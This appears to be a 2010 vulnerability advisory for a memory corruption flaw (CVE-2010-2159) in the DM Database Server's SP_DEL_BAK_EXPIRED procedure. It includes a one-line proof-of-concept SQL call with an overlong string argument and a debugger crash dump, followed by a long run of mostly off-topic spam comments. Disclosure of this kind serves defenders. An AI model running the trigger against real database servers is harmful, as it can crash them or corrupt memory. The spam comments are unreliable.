DM Database Server Memory Corruption Vulnerability
========
Vulnerable:All Version
Vendor:www.dameng.com
Discovered by:Shennan Wang (HuaweiSymantec SRT)
CVE:CVE-2010-2159
Details:
=========
A vulnerability in DM Database Server all version allows attacker to execute \
arbitrary code or cause a DoS (Denial of Service).Authentication is required to exploit this vulnerability.
The specific flaw exists within the SP_DEL_BAK_EXPIRED procedure.

POC:
=========
CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');

(458.5fc): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c
eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** WARNING: Unable to verify checksum for C:\dmdbms\bin\wdm_dll.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for \
C:\dmdbms\bin\wdm_dll.dll -  wdm_dll+0xd1753:
100d1753 f2ae            repne scas byte ptr es:[edi]
0:009> da ebp
074ed1fc  "AAAAAAAAAAAAAAAAAAAA"

Timeline:
========
2010.04.17   Report to vendor,no response.
2010.05.31   Public

Comments

04/19/2012 23:36

Thank you for sharing your life-changing Story. Beautiful! I will share with Colleen :)

05/27/2013 01:23

Servers rule the computers in an office. So any vulnerability to it will affect the whole system. Thank you for discussing about the DM Database Server Memory Corruption Vulnerability. The step by step explanation is very good to diagnose the problem.

09/23/2013 13:36

Excellent post.I want to thank you for this informative read, I really appreciate sharing this great post. Keep up your work! :)

07/03/2013 00:48

Thanks for bringing it to the notice of the online community. I have been using the DM database server and I do hope that they find a patch to fix the issue as soon as possible or else the security risk will affect us badly.

A general rule, professional webmasters "must also be well-versed in Web transaction software, payment-processing software, and security software. Thanks.

08/17/2013 09:20

Top-level executives recognize energy efficiency as a key strategic priority for generating cost savings and building long-term value in a business. They shift from seeing energy as an inevitable and growing cost, and instead see its optimization as a source of continuous leverage for building an efficient and resilient organization capable of meeting its broader mission and goals.

10/08/2013 15:49

I don�t usually respond to posts but I will in this case. Intriguing article. Where did you got all the facts from? Anyhow thank you for this wonderful post! Respectfully.

10/30/2013 10:16

Lastly, Quick Day would be a unique UU vacation and as such might help UUs create a more powerful feeling of identification.

I really like this post. It is very interesting topic and the author is really clever and broadminded person. I would like to read another post this author with great pleasure.

Your post had provided me with another point of view on this topic. Thank you

This is a nice post in an interesting line of content. Thanks for sharing this article, great way of bring such topic to discussion.

01/18/2014 02:41

I will try your suggestions and hope it helps.

01/21/2014 00:34

I have enjoyed this article so much that I have read it multiple times and plan on coming back for any other articles you may publish.

02/02/2014 22:50

There is no question that instantaneous water heaters are good options to trust in terms of their water heating services. However, you need to know that not all kinds of this water heater will work best for you.

02/17/2014 04:18

Thank you so much for the post you do. I like your post and all you share with us is up to date and quite informative

This is all the most useless and barbaric pantomime. I'm a man on the Clapham omnibus, and I can't help thinking that Database Server Memory Corruption Vulnerability is unbelievably important! The future will prove who was correct and who was wrong. Insanity prevails in ophthalmology residency personal statement circles once again.

03/31/2014 23:40

I am sure majority of the dog names are stolen from the baby name book except few like tiger, Zorro, Watcher etc. You have right to do whatever you like and never bother others.

04/03/2014 07:26

uxury camper who needed more help than his colleagues and assisted him to get around through the day. But, this was just the beginning of an eight.

04/05/2014 02:19

First of all let's distinguish between a cv you would use to get a job in an offices in comparison to the type of cv you would use as an acting professional.